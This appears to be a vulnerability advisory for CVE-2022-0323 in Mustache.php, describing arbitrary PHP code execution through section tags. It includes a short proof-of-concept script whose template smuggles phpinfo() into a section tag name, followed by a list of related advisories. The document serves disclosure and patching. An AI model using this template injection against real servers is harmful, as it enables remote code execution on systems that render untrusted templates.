Lucene search
Altm4nA5F5A988-AA52-4443-839D-299A63F44FB7HistoryJan 19, 2022 - 3:04 a.m.
None in bobthecow/mustache.php
2022-01-1903:04:52
altm4n
www.huntr.dev
6
0.001 Low
EPSS
Percentile
45.7%
Description
In Mustache.php v2.0.0 through v2.14.0, Sections tag can lead to arbitrary php code execution even if strict_callables is true when section value is controllable.
Proof of Concept
<?php
require 'vendor/autoload.php';
$m = new Mustache_Engine([
'cache' => './cache',
'strict_callables'=>true
]);
echo $m->render('{{# repo
phpinfo();// }}
No repos :(
{{/ repo
phpinfo();// }}', array('repo' =>array()));
Impact
This vulnerability is capable of arbitrary command execution when attacker can control the value of tag
Related
nvd
nvd
CVE-2022-0323
2022-01-21 18:15:08
github
github
Mustache remote code injection vulnerability
2022-01-27 14:51:00
friendsofphp
friendsofphp
Possible RCE when rendering untrusted user templates
2022-01-21 06:21:37
Possible RCE when rendering untrusted user templates
2022-01-21 06:21:37
cvelist
cvelist
veracode
veracode
Command Injection
2022-01-28 03:09:27
prion
prion
Input validation
2022-01-21 18:15:00
ubuntucve
ubuntucve
CVE-2022-0323
2022-01-21 00:00:00
nessus
nessus
FreeBSD : mustache - Possible Remote Code Execution (65847d9d-7f3e-11ec-8624-b42e991fc52e)
2022-01-30 00:00:00
Moodle 3.11.x < 3.11.9 Multiple Vulnerabilities
2023-02-20 00:00:00
Moodle 3.9.x < 3.9.16 Multiple Vulnerabilities
2023-02-20 00:00:00
osv
osv
CVE-2022-0323
2022-01-21 18:15:08
Mustache remote code injection vulnerability
2022-01-27 14:51:00
freebsd
freebsd
mustache - Possible Remote Code Execution
2022-01-20 00:00:00
cve
cve
CVE-2022-0323
2022-01-21 18:15:08